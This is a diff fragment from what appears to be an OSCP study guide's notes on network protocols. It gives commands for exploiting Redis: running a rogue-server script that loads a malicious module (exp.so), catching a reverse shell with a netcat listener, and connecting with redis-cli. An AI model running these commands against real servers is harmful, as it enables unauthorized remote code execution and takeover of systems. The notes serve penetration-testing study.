Shankar01081991/OSCP-Guide/Network Protocols.md

     ./redis-rogue-server.py --rhost <MIP> --lhost <VIP> --lport=6379 --exp exp.so

-to get the shell typr: r and then enter your <VIP> and port and start Netcat on the same redis-cli -h <IP> -p 6379 -a <password>
+to get the shell type r and then enter your Vpn-IP and port and start Netcat on the same port sudo rlwrap -cAr nc -lvnp port

+redis-cli -h <IP> -p 6379 -a <password>
 Gather Information
 Inside redis-cli: